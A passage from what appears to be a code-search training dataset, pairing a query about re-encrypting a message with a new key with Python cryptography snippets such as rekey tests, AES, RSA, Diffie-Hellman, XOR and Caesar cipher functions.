alice['dh'] = DiffieHellman(prime, base, secret_key=secrets.randbelow(prime))\n alice_pub = alice['dh'].gen_public_key()\n\n (prime, base, key_for_bob) = yield (prime, base, alice_pub)\n\n \n\n #bob recieves 'alice's' public key, generates their own public key and\n #the shared key. Sends their public key ot 'alice'\n bob = {'dh':DiffieHellman(prime, base, secret_key=secrets.randbelow(prime))}\n bob_pup = bob['dh'].gen_public_key()\n bob['dh'].gen_shared_key(key_for_bob)\n\n key_for_alice = yield bob_pup\n\n ### Alice recieves Bob's public key, generates the shared key and encrypts\n ### message for bob\n\n alice['dh'].gen_shared_key(key_for_alice)\n \n alice['sha1'] = SHA1(bso.int_to_bytes(alice['dh'].shared_key))\n alice['cipher'] = AES_CBC(alice['sha1'].digest()[:16], secrets.token_bytes(16))\n alice_ciphertext = alice['cipher'].encrypt(b'Message to Bob')\n alice_ciphertext += alice['cipher'].IV\n\n ciphertext_for_bob = yield alice_ciphertext\n \n #Bob recieves the ciphertext, decrypts it and send a reply.\n\n bob['sha1'] = SHA1(bso.int_to_bytes(bob['dh'].shared_key))\n bob['cipher'] = AES_CBC(bob['sha1'].digest()[:16], secrets.token_bytes(16))\n bob_ciphertext = bob['cipher'].encrypt(b'Message to Alice')\n bob_ciphertext += bob['cipher'].IV\n\n ciphertext_for_alice = yield bob_ciphertext\n\n ### Finally alice decrypts bobs reply\n\n alice['cipher'].decrypt(ciphertext_for_alice[:-16], ciphertext_for_alice[-16:])", "def testGetSquashOneKey(self):\n\n # Assuming proxy's downstream_max is 1,\n # and number of threads is 1.\n\n self.client_connect(0)\n self.client_connect(1)\n self.client_connect(2)\n self.client_connect(3)\n self.client_connect(4)\n\n self.client_send('get wait0\\r\\n', 0)\n self.mock_recv('get wait0\\r\\n', 0)\n\n # Mock server is 'busy' at this point, so\n # any client sends should be able to be\n # de-duplicated by the proxy.\n\n self.client_send('get a\\r\\n', 1)\n self.client_send('get a\\r\\n', 2)\n self.client_send('get a\\r\\n', 3)\n self.client_send('get a\\r\\n', 4)\n\n self.wait(10)\n\n self.mock_send('END\\r\\n', 0)\n self.client_recv('END\\r\\n', 0)\n\n self.mock_recv('get a\\r\\n', 0)\n self.mock_send('VALUE a 0 1\\r\\na\\r\\n', 0)\n self.mock_send('END\\r\\n', 0)\n\n self.client_recv('VALUE a 0 1\\r\\na\\r\\n' +\n 'END\\r\\n', 1)\n self.client_recv('VALUE a 0 1\\r\\na\\r\\n' +\n 'END\\r\\n', 2)\n self.client_recv('VALUE a 0 1\\r\\na\\r\\n' +\n 'END\\r\\n', 3)\n self.client_recv('VALUE a 0 1\\r\\na\\r\\n' +\n 'END\\r\\n', 4)", "def setup_key_decrypt(self):\r\n\t\tself.max_key = math.floor(len(self.message) / 2)\r\n\t\twhile True:\r\n\t\t\tkey = input(\"Please enter the key that was used to encrypt your message.--> \")\r\n\t\t\ttry:\r\n\t\t\t\tself.key = int(key)\r\n\t\t\texcept ValueError:\r\n\t\t\t\tprint(\"Key needs to be a number.\")\r\n\t\t\t\tcontinue\r\n\t\t\tif self.key > self.max_key: \t\t\t\r\n\t\t\t\tprint(f\"{key} is too big of a number.\")\r\n\t\t\telif self.key == 0:\r\n\t\t\t\tprint(\"0 cannot be a key.\")\t\t\t\t\r\n\t\t\telse:\t\t\t\r\n\t\t\t\tbreak", "def _hmac(self, key, msg):\n return hmac.new(key, msg, digestmod=self.hashfunc).digest()", "def _GetKeyString(self):", "def _GetKeyString(self):", "def generate_key():\r\n\t\treturn ''.join(random.SystemRandom().choice(string.ascii_lowercase) for _ in range(123))", "def get_keys(self, update, context):\r\n self.SECRET_KEY = update.message.text\r\n update.message.reply_text(text=f'Новый ключ: {self.SECRET_KEY}')\r\n return ConversationHandler.END", "def setup_key_encrypt(self):\r\n\t\tself.max_key = math.floor(len(self.message) / 2)\r\n\t\twhile True:\r\n\t\t\tkey = input(f\"Please enter a key value less than or equal to {self.max_key}. --> \")\r\n\t\t\ttry:\r\n\t\t\t\tself.key = int(key)\r\n\t\t\texcept ValueError:\r\n\t\t\t\tprint(\"Key needs to be a number.\")\r\n\t\t\t\tcontinue\r\n\t\t\tif self.key > self.max_key: \t\t\t\r\n\t\t\t\tprint(f\"{key} is too big of a number.\")\t\r\n\t\t\telif self.key == 0:\r\n\t\t\t\tprint(\"0 cannot be a key\")\t\t\t\r\n\t\t\telse:\t\t\t\r\n\t\t\t\tbreak", "def testKeyMismatch(self):\n encrypted_data = self.encrypt_wrapper.read(1024 * 1024 * 100)\n\n wrong_key = crypto.RSAPrivateKey().GenerateKey()\n decrypt_wrapper = uploads.DecryptStream(\n readers_private_key=self.readers_private_key,\n writers_public_key=wrong_key.GetPublicKey(),\n outfd=self.outfd)\n\n # We should know after very few bytes that the key is wrong. The\n # first encrypted chunk is the serialized signature which is 518\n # bytes in the test. Adding crypto headers gives a chunk size of\n # 570. After 600 bytes we should definitely bail out.\n with self.assertRaises(crypto.VerificationError):\n decrypt_wrapper.write(encrypted_data[:600])", "def test_previously_sent_message_not_sent_twice(self):\n thread = self.create_thread()\n message = thread.first_message\n message.sent = True\n message.save()\n\n send_message(message.pk)\n\n self.assertFalse(self.groupnotify_mock.called)", "def _is_duplicate_sync_message(self, message):\n community = message.community\n # fetch the duplicate binary packet from the database\n try:\n have_packet, undone = self._database.execute(u\"SELECT packet, undone FROM sync WHERE community = ? AND member = ? AND global_time = ?\",\n (community.database_id, message.authentication.member.database_id, message.distribution.global_time)).next()\n except StopIteration:\n if __debug__: dprint(\"this message is not a duplicate\")\n return False\n\n else:\n have_packet = str(have_packet)\n if __debug__:\n if isinstance(message.distribution, FullSyncDistribution) and message.distribution.enable_sequence_number:\n seq = \" #%d\" % message.distribution.sequence_number\n else:\n seq = \"\"\n if have_packet == message.packet:\n # exact binary duplicate, do NOT process the message\n if __debug__:\n dprint(message.candidate, \" received identical message [\", message.name, \" \", message.authentication.member.database_id, \"@\", message.distribution.global_time, seq, \" undone\" if undone else \"\", \"]\", level=\"warning\")\n\n if undone:\n try:\n proof, = self._database.execute(u\"SELECT packet FROM sync WHERE id = ?\", (undone,)).next()\n except StopIteration:\n pass\n else:\n self._statistics.dict_inc(self._statistics.outgoing, u\"-duplicate-undo-\")\n self._endpoint.send([message.candidate], [str(proof)])\n\n else:\n signature_length = message.authentication.member.signature_length\n if have_packet[:signature_length] == message.packet[:signature_length]:\n # the message payload is binary unique (only the signature is different)\n if __debug__:\n seq = \" #%d\" % message.distribution.sequence_number\n dprint(message.candidate, \" received identical message with different signature [member:\", message.authentication.member.database_id, \"; @\", message.distribution.global_time, seq, \"]\", level=\"warning\")\n\n if have_packet < message.packet:\n # replace our current message with the other one\n self._database.execute(u\"UPDATE sync SET packet = ? WHERE community = ? AND member = ? AND global_time = ?\",\n (buffer(message.packet), community.database_id, message.authentication.member.database_id, message.distribution.global_time))\n\n # notify that global times have changed\n # community.update_sync_range(message.meta, [message.distribution.global_time])\n\n else:\n if __debug__: dprint(message.candidate, \" received message with duplicate community/member/global-time triplet. possibly malicious behavior\", level=\"warning\")\n\n # this message is a duplicate\n return True", "def text(message):\n room = session.get('room')\n key = os.urandom(32)\n iv = os.urandom(16)\n print(key,iv)\n\n print(key[:2],key[:4])\n print(len(key),len(iv))\n print(type(key))\n data = 'hello world 1234' # <- 16 bytes\n\n enc = aes_encrypt(key,data,iv)\n dec = aes_decrypt(key,enc,iv)\n\n print('data:',data)\n print('cipher:', enc)\n print('plain:',dec)\n test = os.urandom(2)\n print('key:', int.from_bytes(test, byteorder='little'))\n print('key', test)\n \n emit('enc_msg', {'key': key.hex(),\n 'cipher': enc.hex(),\n 'iv' : iv.hex(),\n }, room=room)\n emit('message', {'msg': session.get('name') + ':' + message['msg']}, room=room)", "def __PRGA(self, message: bytearray) -> bytearray:\n j = 0\n enc = message.copy()\n key = self.__S.copy()\n for idx in range(len(message)):\n # get i and j\n i = (idx+1) % 256\n j = (j + key[i]) % 256\n # swap i and j\n tmp = key[i]\n key[i] = key[j]\n key[j] = tmp\n # run through LFSR once\n u = self.__LFSR(key)\n # encrypt\n enc[idx] = enc[idx] ^ u\n return enc", "def xorstr (key, msg):\n # join a list of chars into string where list is generated by \n # XORing each of msg bytes with each of the key bytes rotating.\n return ''.join([chr(ord(msg[i]) ^ ord(key[i % len(key)])) for i in range (0, len(msg))])", "def test_decrypt_key_incorrect(self):\n right_key = b'0' * 32\n wrong_key = b'1' * 32\n\n encrypted = encrypt('message', key=right_key)\n\n with pytest.raises(EncryptionError):\n decrypt(encrypted, key=wrong_key)", "def repeating_key_xor(plaintext, key):\n ciphertext = ''\n i = 0\n\n for byte in plaintext:\n ciphertext += chr(byte ^ key[i])\n\n i = (i + 1) % len(key)\n return ciphertext", "def discard(self, key: KT) -> None:\n discard(self, key)", "def _KeyMissing(side):\n return 'Key missing from %s' % side", "def _key_generated(self, key, index):\n self.keys[self.get_address(key)] = key\n self.last_generated_index = index", "def _newKey(self, key):\n self._testKeySubNsAdd()\n self._getKeyList().append(key)", "def MakeKey(self, string, string_1, string_2):\n ...", "def test_envelope_routed(self):\n addr_1 = self.connection_client_1.address\n addr_2 = self.connection_client_2.address\n\n msg = DefaultMessage(\n dialogue_reference=(\"\", \"\"),\n message_id=1,\n target=0,\n performative=DefaultMessage.Performative.BYTES,\n content=b\"hello\",\n )\n envelope = Envelope(\n to=addr_2,\n sender=addr_1,\n protocol_specification_id=DefaultMessage.protocol_specification_id,\n message=DefaultSerializer().encode(msg),\n )\n\n self.multiplexer_client_1.put(envelope)\n delivered_envelope = self.multiplexer_client_2.get(block=True, timeout=20)\n\n assert delivered_envelope is not None\n assert delivered_envelope.to == envelope.to\n assert delivered_envelope.sender == envelope.sender\n assert (\n delivered_envelope.protocol_specification_id\n == envelope.protocol_specification_id\n )\n assert delivered_envelope.message == envelope.message", "def test_envelope_routed(self):\n addr_1 = self.connection_client_1.address\n addr_2 = self.connection_client_2.address\n\n msg = DefaultMessage(\n dialogue_reference=(\"\", \"\"),\n message_id=1,\n target=0,\n performative=DefaultMessage.Performative.BYTES,\n content=b\"hello\",\n )\n envelope = Envelope(\n to=addr_2,\n sender=addr_1,\n protocol_specification_id=DefaultMessage.protocol_specification_id,\n message=DefaultSerializer().encode(msg),\n )\n\n self.multiplexer_client_1.put(envelope)\n delivered_envelope = self.multiplexer_client_2.get(block=True, timeout=20)\n\n assert delivered_envelope is not None\n assert delivered_envelope.to == envelope.to\n assert delivered_envelope.sender == envelope.sender\n assert (\n delivered_envelope.protocol_specification_id\n == envelope.protocol_specification_id\n )\n assert delivered_envelope.message == envelope.message", "def eliminate_key (self,key):\r\n\r\n if self.using_shelf:\r\n\r\n del self.key_dict[str(key)]", "def generate_key():\n key = list(Fleissner.default)\n random.shuffle(key)\n done = False\n while not done:\n try:\n Fleissner(key=\"\".join(key))\n done = True\n except:\n random.shuffle(key)\n return \"\".join(key)", "def test_data_missing_key_builder(self):\n graph = BELGraph()\n p1 = protein(\"HGNC\", n())\n p2 = protein(\"HGNC\", n())\n graph.add_node_from_data(p1)\n graph.add_node_from_data(p2)\n\n key, other_key = \"k1\", \"k2\"\n\n data_missing_key = data_missing_key_builder(key)\n\n graph.nodes[p1][key] = n()\n graph.nodes[p2][other_key] = n()\n\n nodes = set(filter_nodes(graph, data_missing_key))\n\n self.assertNotIn(p1, nodes)\n self.assertIn(p2, nodes)", "def encrypt_message(K, message):\n\n plaintext = message.encode(\"utf8\")\n \n aes = Cipher(\"aes-128-gcm\")\n iv = urandom(16)\n # Encryption using AES-GCM returns a ciphertext and a tag\n ciphertext, tag = aes.quick_gcm_enc(K, iv, plaintext) \n \n\n return (iv, ciphertext, tag)", "def private_key(self):", "def decrypt(self, key):\n super(MACDataUplinkMessage, self).decrypt(key, dir=0)", "def test_multiple_messages_received_at_once(self):\n # Send 2 messages\n self.sock.send(message + message)\n # Receive them back\n ident, payload = self.inverter.receive()\n self.assertEqual(b\"\\x00\\x01\\x02\", ident)\n self.assertEqual(b\"\", payload)\n ident, payload = self.inverter.receive()\n self.assertEqual(b\"\\x00\\x01\\x02\", ident)\n self.assertEqual(b\"\", payload)", "def make_hmac(message, key):\n h = HMAC.new(key)\n h.update(message)\n return h.hexdigest()", "def test_encrypt_key_invalid(self):\n with pytest.raises(EncryptionError):\n encrypt('message', key=b'0' * 31)", "def exchange_key(connection, pub_key):\r\n\r\n if main.diffe_key_exchange is False:\r\n # Get the server's public key\r\n server_pub_key_bytes = connection.recv(1024)\r\n\r\n # Send public key\r\n connection.sendall(rsa.PublicKey.save_pkcs1(pub_key))\r\n\r\n else:\r\n # Rounds of bit-shifting and XOR\r\n rounds = 64\r\n\r\n while True:\r\n\r\n # Generate 4096-bit keys (RFC 3526 Group 16)\r\n client_diffe_key = pyDHE.new(16)\r\n shared_secret = client_diffe_key.negotiate(connection)\r\n\r\n # Encrypt\r\n encrypted = int(binascii.hexlify(rsa.PublicKey.save_pkcs1(pub_key)).decode(), 16)\r\n for x in range(0, rounds):\r\n encrypted = encrypted ^ (shared_secret ** rounds)\r\n encrypted = encrypted << rounds\r\n encrypted = int(str(encrypted)[::-1])\r\n\r\n # Decrypt\r\n decrypted = encrypted\r\n decrypted = int(str(decrypted)[::-1])\r\n for x in range(rounds, 0, -1):\r\n decrypted = decrypted >> rounds\r\n decrypted = decrypted ^ (shared_secret ** rounds)\r\n\r\n # Check if able to decrypt\r\n try:\r\n binascii.unhexlify(hex(decrypted)[2:]).decode()\r\n client_success = True\r\n\r\n # Generate new keys upon failure and try again\r\n except UnicodeDecodeError:\r\n client_success = False\r\n pass\r\n except binascii.Error:\r\n client_success = False\r\n pass\r\n\r\n # Notify client about encryption status\r\n server_success = connection.recv(1024)\r\n if client_success is False:\r\n connection.send(b'DHE')\r\n else:\r\n connection.send(b'CONTINUE')\r\n\r\n # Get encryption status from client\r\n if client_success is False or server_success == b'DHE':\r\n pass\r\n elif server_success == b'CONTINUE':\r\n break\r\n\r\n # Hold encrypted server key\r\n server_encrypted = b''\r\n\r\n # Receive encrypted key from the server\r\n while True:\r\n data = connection.recv(8192)\r\n if data == b'ENDED':\r\n break\r\n elif data[-5:] == b'ENDED':\r\n server_encrypted += data[:-5]\r\n break\r\n server_encrypted += data\r\n\r\n # Send the encrypted key to the server\r\n connection.sendall(bytes(hex(encrypted).encode()))\r\n connection.send(b'ENDED')\r\n\r\n # Decrypt the client's public key\r\n decrypted = int(server_encrypted, 16)\r\n decrypted = int(str(int(decrypted))[::-1])\r\n for x in range(rounds, 0, -1):\r\n decrypted = decrypted >> rounds\r\n decrypted = decrypted ^ (shared_secret ** rounds)\r\n\r\n server_pub_key_bytes = binascii.unhexlify(hex(decrypted)[2:]).decode()\r\n\r\n server_pub_key = rsa.PublicKey.load_pkcs1(server_pub_key_bytes)\r\n # Determine max message size\r\n max_message_size = common.byte_size(server_pub_key.n) - 11\r\n\r\n # Return crypto key information\r\n return server_pub_key, server_pub_key_bytes, max_message_size", "def message(self, key):\n msg = '[ensime] ' + feedback[key]\n self.raw_message(msg)", "def shouldPrintMessage(self, timestamp: int, message: str) -> bool:\n if message not in self.hashmap:\n self.hashmap[message] = timestamp\n return True\n elif timestamp - self.hashmap[message] >= 10:\n self.hashmap[message] = timestamp\n return True\n return False", "def key( self, mess, args):\n user = mess.getFrom()\n if user in self.users:\n return 'You are already subscribed.'\n else:\n self.users[user] = args\n self.log( '%s subscribed to the broadcast.' % user)\n return 'You are now subscribed.'", "def GenerateKey(self):\n self.key_name = self.key_name or str(uuid.uuid4())\n if self.key is None or not self.key.id():\n self.key = ndb.Key(self._get_kind(), self.key_name)\n return True\n return False", "def encrypt_message(message: str, key: int = 17):\n\n alphabet = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n shifted_alphabet = alphabet[key:] + alphabet[:key]\n encrypted_message = \"\"\n\n for i in message.upper():\n\n # Use encryption for letters only, keep the rest\n if i in alphabet:\n\n # Find index in alphabet\n for idx, l in enumerate(alphabet):\n if i == l:\n\n # Add letter in shifted alphabet\n # with this index to the message\n encrypted_message += shifted_alphabet[idx]\n else:\n encrypted_message += i\n\n return encrypted_message" ]
[ "0.6353171", "0.6112065", "0.6050746", "0.60195196", "0.60014725", "0.5931781", "0.59107494", "0.58862585", "0.58743024", "0.5822409", "0.5816319", "0.5803703", "0.5773151", "0.57707894", "0.5769746", "0.57522786", "0.5739855", "0.56940407", "0.5691956", "0.5683916", "0.5650976", "0.5640389", "0.5614024", "0.5602148", "0.55912846", "0.5574919", "0.55580616", "0.55496866", "0.5525936", "0.55230445", "0.5513836", "0.5505172", "0.55045414", "0.5489394", "0.5483186", "0.54536504", "0.5396713", "0.5381907", "0.53645647", "0.53645647", "0.5329567", "0.5302337", "0.53008956", "0.5295404", "0.5285801", "0.5283134", "0.5280055", "0.5262407", "0.5262407", "0.52621925", "0.52621925", "0.52533925", "0.52479744", "0.52373976", "0.52370113", "0.5236767", "0.5235933", "0.52343446", "0.5220521", "0.5216978", "0.5215469", "0.52055377", "0.5195433", "0.51794", "0.5176292", "0.51760805", "0.51760805", "0.5174731", "0.51656085", "0.51408476", "0.5139458", "0.51391447", "0.51337326", "0.51320624", "0.51094365", "0.51083463", "0.51068926", "0.5098633", "0.5093519", "0.50934523", "0.5092304", "0.5089464", "0.5087012", "0.50843865", "0.50843865", "0.508311", "0.50807506", "0.5074735", "0.50747067", "0.5064746", "0.50545263", "0.5051179", "0.5051056", "0.5051052", "0.50476384", "0.50456655", "0.50389475", "0.503734", "0.5031326", "0.5025984" ]
0.55720454
26
It reencrypts an encrypted message using a new key.
def test_rekey(self): old_key = b'0' * 32 new_key = b'1' * 32 old_encrypted = encrypt('message', key=old_key) new_encrypted = rekey(old_encrypted, old_key=old_key, new_key=new_key) assert decrypt(new_encrypted, key=new_key) == 'message'
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_rekey_defaults(self, settings):\n old_key = b'0' * 32\n new_key = b'1' * 32\n\n settings.CHITON_ENCRYPTION_KEY = new_key\n settings.CHITON_PREVIOUS_ENCRYPTION_KEY = old_key\n\n encrypted = encrypt('message', key=old_key)\n rekeyed = rekey(encrypted)\n\n assert decrypt(rekeyed) == 'message'", "def test_rekey_key_format(self):\n old_key = b'0' * 32\n encrypted = encrypt('message', key=old_key)\n\n with pytest.raises(EncryptionError):\n rekey(encrypted, old_key=old_key, new_key=b'1' * 31)", "def test_rekey_non_encrypted(self):\n with pytest.raises(EncryptionError):\n rekey('message', old_key=b'0' * 32, new_key=b'1' * 32)", "def encrypt(self, message, key):\n return self.translateMessage(message, key, \"encrypt\")", "def encrypt(key, plaintext):\n data = fk(keyGen(key)[0], ip(plaintext))\n return fp(fk(keyGen(key)[1], swapNibbles(data)))", "def encrypt(key, plaintext, cipher):\n\n rsa = Rsa()\n\n try:\n k = TomlKeyFormatter().from_string(key.read())\n\n p = plaintext.read()\n c = rsa.encrypt(p, k)\n\n cipher.write(c)\n\n except KeyFormatError:\n click.echo(\"ERROR: Key is in bad format\")\n\n except OverflowError:\n click.echo(\"ERROR: Message is to long for encryption with the given key.\")", "def fernet_encript(key,message):\n\tf = Fernet(key)\n\treturn f.encrypt(message)", "def update(self, plaintext):\n return self._encryptor.update(plaintext)", "def test_encrypt_key(self):\n encrypted = encrypt('message', key=b'0' * 32)\n\n assert encrypted\n assert encrypted != 'message'", "def encrypt(self, message, key):\n message = self.pkcs7_pad(message)\n iv = ''.join(chr(random.randint(0, 0xFF)) for i in range(AES.block_size))\n cipher = AES.new(key, AES.MODE_CBC, iv, segment_size=64)\n return iv + cipher.encrypt(message)", "def encrypt_message(message: str, key: int = 17):\n\n alphabet = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n shifted_alphabet = alphabet[key:] + alphabet[:key]\n encrypted_message = \"\"\n\n for i in message.upper():\n\n # Use encryption for letters only, keep the rest\n if i in alphabet:\n\n # Find index in alphabet\n for idx, l in enumerate(alphabet):\n if i == l:\n\n # Add letter in shifted alphabet\n # with this index to the message\n encrypted_message += shifted_alphabet[idx]\n else:\n encrypted_message += i\n\n return encrypted_message", "def encryption(msg):\n \n start_key = 123\n key_increment = 4\n string = []\n encoded = []\n key = start_key\n message = msg\n for c in range(0, len(message)):\n code = ord(message[c])\n change = code+key\n new = chr(change)\n string += new\n key += key_increment\n \n encoded = ''.join(string)\n return ('Encoded Message:\\t' + encoded)", "def rsa_encrypt(message, publickey):\r\n \r\n # A key object is created to interact with the PyCrypto\r\n # encryption suite. The object contains key data and\r\n # the necessary rsa functions.\r\n temp_key_obj = _rsa_keydict_to_keyobj(publickey)\r\n \r\n return _rsa_chopstring(message, temp_key_obj, temp_key_obj.encrypt)", "def repeating_key_xor(plaintext, key):\n ciphertext = ''\n i = 0\n\n for byte in plaintext:\n ciphertext += chr(byte ^ key[i])\n\n i = (i + 1) % len(key)\n return ciphertext", "def caesarShiftStringOps(message, key, encrypt=True):\n message = message.lower().replace(' ', '')\n alphabet = string.ascii_lowercase\n\n if not encrypt:\n key = -key\n\n shiftedAlphabet = alphabet[key:] + alphabet[:key]\n return message.translate(str.maketrans(alphabet, shiftedAlphabet))", "def func(plaintext, key):\n ciphertext = xor(plaintext, key)\n return ciphertext", "def decrypt_message(encrypted_message):", "def encrypt(message, key):\n\tnumericRepresentation = []\n\tfor c in message:\n\t\tnumericRepresentation.append(ord(c) - 65)\n\n\tcipher = \"\"\n\tfor x in numericRepresentation:\n\t\tcipher += chr((x + key) % 26 + 65)\n\n\treturn cipher", "def caesarShift(message, key, encrypt=True):\n message = message.lower().replace(' ', '')\n alphabet = string.ascii_lowercase\n newMessage = \"\"\n\n # Change shift direction depending on encrypting or decrypting\n if not encrypt:\n key = -key\n\n # Loop through the message\n for char in message:\n index = alphabet.find(char)\n newMessage += alphabet[(index + key) % 26]\n\n return newMessage", "def aes_encrypt(data, key):\r\n cipher = aes_cipher_from_key(key)\r\n padded_data = pad(data)\r\n return cipher.encrypt(padded_data)", "def decrypt(key, cipher, plaintext):\n\n rsa = Rsa()\n\n try:\n k = TomlKeyFormatter().from_string(key.read())\n\n c = cipher.read()\n p = rsa.decrypt(c, k)\n\n plaintext.write(p)\n\n except KeyFormatError:\n click.echo(\"ERROR: Key is in bad format\")\n\n except DecryptError:\n click.echo(\"ERROR: Key is wrong or message was badly padded before encryption\")", "def exchange_key(connection, pub_key):\r\n\r\n if main.diffe_key_exchange is False:\r\n # Get the server's public key\r\n server_pub_key_bytes = connection.recv(1024)\r\n\r\n # Send public key\r\n connection.sendall(rsa.PublicKey.save_pkcs1(pub_key))\r\n\r\n else:\r\n # Rounds of bit-shifting and XOR\r\n rounds = 64\r\n\r\n while True:\r\n\r\n # Generate 4096-bit keys (RFC 3526 Group 16)\r\n client_diffe_key = pyDHE.new(16)\r\n shared_secret = client_diffe_key.negotiate(connection)\r\n\r\n # Encrypt\r\n encrypted = int(binascii.hexlify(rsa.PublicKey.save_pkcs1(pub_key)).decode(), 16)\r\n for x in range(0, rounds):\r\n encrypted = encrypted ^ (shared_secret ** rounds)\r\n encrypted = encrypted << rounds\r\n encrypted = int(str(encrypted)[::-1])\r\n\r\n # Decrypt\r\n decrypted = encrypted\r\n decrypted = int(str(decrypted)[::-1])\r\n for x in range(rounds, 0, -1):\r\n decrypted = decrypted >> rounds\r\n decrypted = decrypted ^ (shared_secret ** rounds)\r\n\r\n # Check if able to decrypt\r\n try:\r\n binascii.unhexlify(hex(decrypted)[2:]).decode()\r\n client_success = True\r\n\r\n # Generate new keys upon failure and try again\r\n except UnicodeDecodeError:\r\n client_success = False\r\n pass\r\n except binascii.Error:\r\n client_success = False\r\n pass\r\n\r\n # Notify client about encryption status\r\n server_success = connection.recv(1024)\r\n if client_success is False:\r\n connection.send(b'DHE')\r\n else:\r\n connection.send(b'CONTINUE')\r\n\r\n # Get encryption status from client\r\n if client_success is False or server_success == b'DHE':\r\n pass\r\n elif server_success == b'CONTINUE':\r\n break\r\n\r\n # Hold encrypted server key\r\n server_encrypted = b''\r\n\r\n # Receive encrypted key from the server\r\n while True:\r\n data = connection.recv(8192)\r\n if data == b'ENDED':\r\n break\r\n elif data[-5:] == b'ENDED':\r\n server_encrypted += data[:-5]\r\n break\r\n server_encrypted += data\r\n\r\n # Send the encrypted key to the server\r\n connection.sendall(bytes(hex(encrypted).encode()))\r\n connection.send(b'ENDED')\r\n\r\n # Decrypt the client's public key\r\n decrypted = int(server_encrypted, 16)\r\n decrypted = int(str(int(decrypted))[::-1])\r\n for x in range(rounds, 0, -1):\r\n decrypted = decrypted >> rounds\r\n decrypted = decrypted ^ (shared_secret ** rounds)\r\n\r\n server_pub_key_bytes = binascii.unhexlify(hex(decrypted)[2:]).decode()\r\n\r\n server_pub_key = rsa.PublicKey.load_pkcs1(server_pub_key_bytes)\r\n # Determine max message size\r\n max_message_size = common.byte_size(server_pub_key.n) - 11\r\n\r\n # Return crypto key information\r\n return server_pub_key, server_pub_key_bytes, max_message_size", "def encryptCaesar(message, key):\r\n newMessage = \"\"\r\n for char in message:\r\n if char in alphaLower:\r\n newLetterPosition = (alphaLower.index(char) + key) % 26\r\n newMessage += alphaLower[newLetterPosition]\r\n elif char in alphaUpper:\r\n newLetterPosition = (alphaUpper.index(char) + key) % 26\r\n newMessage += alphaUpper[newLetterPosition]\r\n else: newMessage += char\r\n return newMessage", "def encrypt(text,key):\r\n aes = pyaes.AESModeOfOperationCTR(key)\r\n ciphertext = aes.encrypt(text)\r\n return ciphertext", "def encrypt(message, key):\r\n # --- YOU CODE STARTS HERE\r\n if type(message) != str or type(key) != int:\r\n return 'Invalid input'\r\n alpha_lower = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\r\n alpha_upper = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']\r\n\r\n new_st = ''\r\n\r\n for x in message:\r\n if (alpha_lower.count(x) != 0) or (alpha_upper.count(x) != 0):\r\n if alpha_lower.count(x) != 0 and alpha_lower.index(x) + key < 26:\r\n new_st += alpha_lower[alpha_lower.index(x) + key]\r\n\r\n if alpha_upper.count(x) != 0 and alpha_upper.index(x) + key < 26:\r\n new_st += alpha_upper[alpha_upper.index(x) + key]\r\n\r\n if alpha_upper.count(x)!= 0 and alpha_upper.index(x) + key >= 26:\r\n new_st += alpha_upper[alpha_upper.index(x) + key - 26]\r\n\r\n if alpha_lower.count(x) != 0 and alpha_lower.index(x) + key >= 26:\r\n new_st += alpha_lower[alpha_lower.index(x) + key - 26]\r\n else:\r\n new_st += x\r\n\r\n return new_st\r\n\r\n # --- CODE ENDS HERE\r", "def encrypt(self, message, key=None):\n if key is None:\n key = self.public_key\n encrypter = RSA.importKey(key)\n return encrypter.encrypt(message, 2048)", "def test_decrypt_key(self):\n key = b'0' * 32\n\n encrypted = encrypt('message', key=key)\n assert decrypt(encrypted, key=key) == 'message'", "def encrypt(message, pub_key):\n\n if not isinstance(pub_key, key.PublicKey):\n raise TypeError(\"You must use the public key with encrypt\")\n\n return chopstring(message, pub_key.e, pub_key.n, encrypt_int)", "def encrypt(cls, plaintext, aad, key, iv):", "def encrypt_message(self, message):\n\t\tf = Fernet(self.key)\n\t\treturn f.encrypt(message.encode())", "def update_key(self):\n self.__prev_key = self.__new_key", "def encrypt(self, message):\n E = (((k + int_mapping(c)) % 26) for k, c in zip(cycle(self.key), preprocess(message)))\n return ''.join(char_mapping(n) for n in E)", "def encrypt(plaintext: str, key: str) -> str:\n return \"\".join(chr(ord(p) ^ ord(k)) for (p, k) in zip(plaintext, key))", "def run():\n key = input(\"Enter a 26 letter key: \")\n if not isValidKey(key):\n print(\"Invalid key.\")\n return\n plainText = input(\"Plain Text: \")\n cipherText = substitution(plainText, key)\n print(f\"Cipher Text: {cipherText}\")\n return", "def decrypt(message, key):\r\n\r\n # --- YOU CODE STARTS HERE\r\n if type(message) != str or type(key) != int:\r\n return 'Invalid input'\r\n new_st = ''\r\n alpha_lower = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\r\n alpha_upper = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']\r\n\r\n for x in message:\r\n if (alpha_lower.count(x) != 0) or (alpha_upper.count(x) != 0):\r\n if alpha_lower.count(x) != 0:\r\n new_st += alpha_lower[alpha_lower.index(x) - key]\r\n if alpha_upper.count(x) != 0:\r\n new_st += alpha_upper[alpha_upper.index(x) - key]\r\n else:\r\n new_st += x\r\n\r\n return new_st\r\n\r\n\r\n # --- CODE ENDS HERE\r", "def encrypt(plaintext, key, verbose=False):\n Nb = 4\n Nk = int((len(key) * 4) / 32)\n Nr = Nk + 6\n w = key_expansion(text_to_bytes(key), Nb, Nr, Nk)\n state = text_to_matrix(plaintext)\n\n print_round(0, 'input', matrix_to_text(state), verbose)\n add_round_key(state, w, 0, Nb)\n print_round(0, 'k_sch', get_round_key(w, 0, Nb), verbose)\n\n for round in range(1, Nr + 1):\n print_round(round, 'start', matrix_to_text(state), verbose)\n\n sub_bytes(state)\n print_round(round, 's_box', matrix_to_text(state), verbose)\n\n shift_rows(state)\n print_round(round, 's_row', matrix_to_text(state), verbose)\n\n if round != Nr:\n mix_columns(state)\n 